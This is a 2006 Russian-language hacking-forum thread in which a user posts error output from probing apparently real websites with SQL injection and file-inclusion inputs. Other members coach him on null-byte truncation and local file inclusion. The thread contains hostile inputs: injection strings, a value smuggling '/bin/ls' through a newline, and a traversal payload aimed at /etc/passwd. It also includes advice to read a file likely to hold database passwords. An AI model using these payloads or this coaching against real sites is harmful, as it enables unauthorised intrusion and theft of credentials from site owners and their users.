HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Помощь по SQL & PHP
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Помощь по SQL & PHP
  #1  
Старый 07.12.2006, 14:17
Lorix
Новичок
Регистрация: 05.12.2006
Сообщений: 16
С нами: 10226605

Репутация: 1
По умолчанию Помощь по SQL & PHP
В общем если такие ошибки возможен ли тут sql иньекция ?

1,
ndex.php?ID=-1'1699&CATEGORY=0-N-1'ews

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sfl1/domains/2uk/public_html/story2.php on line 12

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in
/home/sfl1/domains/2uk/public_html/story2.php on line 17

*******************************************
2,

ain.php?pid=?Qalias=x%0a/bin/ls%20/

Warning: main(pages/?Qalias=x /bin/ls /.php): failed to open stream: No such file or directory in /var/www/clients/jus/main.php on line 97

Warning: main(): Failed opening 'pages/?Qalias=x /bin/ls /.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/clients/just/main.php on line 97

********************************************

3,

/index.htm?id=-1'2518
Fatal error: Call to undefined method DB_Error::fetchInto() in /var/www/html/core/lib/classes/GO_DbObj.php on line 536
********************************************
?_m=news&_a=viewnews&newsid=-1'
Fatal error: Invalid News Item in /home/wwwdkho/public_html/support/modules/news/client_news.php on line 102
*********************************
4.


ndex.php?id='company/services


Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186

Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186

******************************************
И напоследок вот такое

/index.php?id_page=-1

При значение -1
Некаких ошибок нету. Просто Появлятеся белая страница ( инечегона ней нету)

**********************************
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 07.12.2006, 14:23
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию
1. возможно sql-inj. По крайне мере раскрытие серверного пути на лицо
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
3. вряд ли скуль.. просто ошибка в обработке данных. Но также во втором случае не исключена возможность sql-inj.
4. чистой воды локальный инклуд. Пробуй отсечь расширения - %00

про "напоследок".. это просто реакция такая на "плохой" параметр...скуль возможна.
 

  #3  
Старый 07.12.2006, 14:33
Lorix
Новичок
Регистрация: 05.12.2006
Сообщений: 16
С нами: 10226605

Репутация: 1
По умолчанию
Сенк. Сейчас буду пробывать
 

  #4  
Старый 07.12.2006, 14:35
EXSlim
Познающий
Регистрация: 09.10.2006
Сообщений: 92
С нами: 10308818

Репутация: 87
По умолчанию
Цитата:
Сообщение от Rebz  
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
только локальный инклюд из /pages. %00 уместен.

3. Вызов неопределенного метода класса. При возможности глянуть на сам класс GO_DbObj.php
Последний раз редактировалось EXSlim; 07.12.2006 в 14:37..
 

  #5  
Старый 07.12.2006, 14:43
Lorix
Новичок
Регистрация: 05.12.2006
Сообщений: 16
С нами: 10226605

Репутация: 1
По умолчанию
А где можно поподробнее почитать про локальные инклюды?

Чтото инфы я так и ненашёл. а по мускульным инклюдам врое достаточно
 

  #6  
Старый 07.12.2006, 14:51
Lorix
Новичок
Регистрация: 05.12.2006
Сообщений: 16
С нами: 10226605

Репутация: 1
По умолчанию
Во вотором примере пробывал вот так

main.php?pid=?../../../../../../../etc/passwd%00

Warning: main(pages/?../../../../../../../etc/passwd\0.php): failed to open stream: No such file or directory in /var/www/clients/juааlar/main.php on line 97
 

  #7  
Старый 07.12.2006, 15:05
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию
значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного
 

  #8  
Старый 07.12.2006, 15:28
Lorix
Новичок
Регистрация: 05.12.2006
Сообщений: 16
С нами: 10226605

Репутация: 1
По умолчанию
Цитата:
Сообщение от Rebz  
значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного

Можеш плиз в аську стукнутся 491104
 

  #9  
Старый 07.12.2006, 15:42
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
Цитата:
main(pages/
можно инклудить токо то что в папке pages/
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #10  
Старый 07.12.2006, 16:26
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
С нами: 10715512

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию
про локальные инклуды можешь почитать здесь http://forum.antichat.ru/threadnav22832-1-10.html
в 4 случае ты можешь просмотреть services.txt, вероятнее всего там php код. возможно там есть ошибки или пароли к бд.
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.